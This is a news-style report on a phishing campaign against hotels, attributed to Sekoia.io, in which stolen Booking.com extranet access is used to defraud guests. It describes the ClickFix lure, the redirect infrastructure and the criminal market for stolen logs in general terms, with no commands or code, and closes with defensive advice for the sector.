Since the spring of 2025, a campaign of computer attacks has hit hotels around the world with an effectiveness that has deceived thousands of travelers. This operation, called “I Paid Twice” by the Sekoia.io teams, is based on the simple idea of first infecting hotel establishments, to exploit access to their Booking.com accounts in order to trap customers with messages of almost perfect credibility.
The first breach: a booby-trapped email, sent from a legitimate account
The attack begins with an email addressed not to travelers, but to reservation services or hotel administrative addresses. The messages come from compromised business accounts, sometimes belonging to other companies, and realistically mimic Booking.com’s visual identity. The objects are designed to attract the attention of a busy receptionist: “New last-minute booking”, “New guest message” or “Tracking code”. There is no indication that this is a booby-trapped message and affected hotels sometimes receive several similar emails within a few days, as if booking activity is intensifying.
The link contained in the message does not immediately open a malicious page but first goes through a complex infrastructure of redirects. Hundreds of domain names, all built on the same model, send the user to intermediate HTTP pages containing only a meta-refresh tag, before switching them to the final URL. This architecture is typical of a TDS, a traffic distribution system designed to absorb blockages, hide the actual servers, and survive takedown attempts.
The ClickFix trap: a PowerShell command that compromises the entire system
At the end of these redirections, the hotelier lands on a page which reproduces the interface of the Booking extranet, with the official branding, URL elements likely to inspire confidence and a fake reCAPTCHA entitled ClickFix. The manipulation consists of convincing the user to copy a PowerShell command into their terminal to “unblock access” or “verify their identity”. The operation only lasts a few seconds, but it is enough to completely compromise the machine.
Operation: messages sent to customers, enriched with real data
Once the workstation is compromised and extranet access captured, the attack enters its second phase. Cybercriminals connect to the hotel’s Booking.com account and retrieve reservation data: identities, dates of stay, amounts, photos of the establishment, previous exchanges. This authentic information allows them to contact customers and initiate a credible exchange, either directly from the Booking messaging service or via WhatsApp.
Victims then receive a message indicating an alleged bank verification problem and asking them to confirm their information to avoid cancellation of their reservation. The link provided takes you to a page that perfectly mimics Booking.com or Expedia, right down to the typography. These pages, hosted behind Cloudflare and hidden by a Russian ASN operated as bulletproof hosting, collect the bank details entered by travelers. Sekoia.io confirms that several customers actually paid twice for their stay: once with the hotel, and a second time with the cybercriminal.
A criminal ecosystem structured around Booking access
Since 2022, Russian-speaking forums have been full of sales and purchases of Booking logs, coming from machines infected by infostealers. Prices vary from a few cents to several thousand dollars depending on the quality of the identifiers, the number of establishments administered and the associated fraud potential. Some players are dedicated exclusively to the purchase and resale of these logs, such as the group operating under the pseudonym moderator_booking, which claims more than $20 million in revenue from this model.
Other cybercriminals specialize in collecting emails from hotel administrators, scraping thousands of sites in the sector or offering databases sorted by country or category of establishment. Finally, teams of “traffers” take charge of distributing the malware, routing traffic from Twitter, Facebook or Google to the malicious pages in exchange for a share of the profits.
The whole constitutes a perfectly organized market, where each stage of fraud (infection, resale, validation, exploitation, phishing) can be handled by specialized players.
A lasting threat to the hotel sector
The “I Paid Twice” campaign demonstrates that hotels are exposed not because of a technical vulnerability unique to Booking.com, but because they provide a more accessible entry point for cybercriminals. Their exposure is explained by the weakness of protection at reception stations, the absence of network segmentation, the lack of team training and the very strong dependence on reservation extranets. These compromises then result in direct financial losses, reimbursement requests, tensions with customers, legal risks and lasting damage to reputation.
A repeatable model and a major alert for the industry
This fraud, based on the compromise of service providers and the exploitation of authentic data, goes far beyond the hotel sector alone. It could be extended to all areas whose value chains rely on extranets, management portals or poorly protected partner interfaces. Travel agencies, seasonal rentals, transport companies, but also logistics, health, real estate and retail.
In an environment where these operations are being perfected, only a rigorous combination of staff training, secure access and mastery of digital tools will make it possible to sustainably contain this type of attack.
